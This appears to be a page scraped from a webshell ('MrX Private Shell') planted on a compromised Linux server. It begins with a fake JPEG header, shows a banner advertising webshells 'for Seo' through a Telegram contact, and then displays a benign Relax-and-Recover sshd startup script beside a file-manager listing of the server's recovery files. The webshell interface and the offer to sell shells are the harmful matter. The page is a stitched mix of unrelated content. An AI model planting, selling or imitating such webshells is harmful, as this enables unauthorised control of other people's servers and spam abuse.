����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/usr/bin/bash
# Check /etc/inittab for "ssh:23:respawn:..." which means sshd should be started
# (that entry is written by rescue/default/500_ssh.sh if sshd should be started):
if grep -q '^ssh:' /etc/inittab ; then
if ! test -s /etc/ssh/ssh_host_rsa_key ; then
# Generate at least an rsa SSH host key if there is none to be fail-safe against
# running sshd possibly without any SSH host key which is not accessible from remote
# (on the remote host one would get "Connection to recovery.system.IP.address closed.")
# cf. build/default/500_ssh_setup.sh
# Run ssh-keygen silently with '-q' to avoid messages about key generation
# that swamp the recovery system login screen so that there is be no longer a login prompt visible
# cf. https://github.com/rear/rear/issues/1512#issuecomment-348196998
ssh-keygen -q -t rsa -N '' -f /etc/ssh/ssh_host_rsa_key
echo -e "\nSSH fingerprint: $( ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub )\n" >> /etc/issue
fi
mkdir -p /run/sshd
# Avoid "Could not load host key: /etc/ssh/ssh_host_..._key" messages
# that look confusing on the recovery system login screen
# cf. https://github.com/rear/rear/issues/1512#issuecomment-348196998
# and without '-D' one gets at least on SLES11 with SysVinit
# INIT: Id "ssh" respawning too fast: disabled for 5 minutes
# cf. https://github.com/rear/rear/issues/1512#issuecomment-348201905
exec /bin/sshd -D 2>/dev/null
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| system-setup.d | Folder | 0755 |
|
|
| boot | File | 1.51 KB | 0755 |
|
| dhcp-setup-functions.sh | File | 22.11 KB | 0644 |
|
| do-shutdown | File | 258 B | 0755 |
|
| ramdisk-rootfs | File | 569 B | 0755 |
|
| run-automatic-rear | File | 2.75 KB | 0755 |
|
| run-serial | File | 283 B | 0755 |
|
| run-sshd | File | 1.48 KB | 0755 |
|
| run-syslog | File | 1006 B | 0755 |
|
| system-setup | File | 13.97 KB | 0755 |
|
| system-setup-functions.sh | File | 1.27 KB | 0644 |
|
| system-status.sh | File | 1.45 KB | 0755 |
|
| unlock-opal-disks | File | 15.98 KB | 0755 |
|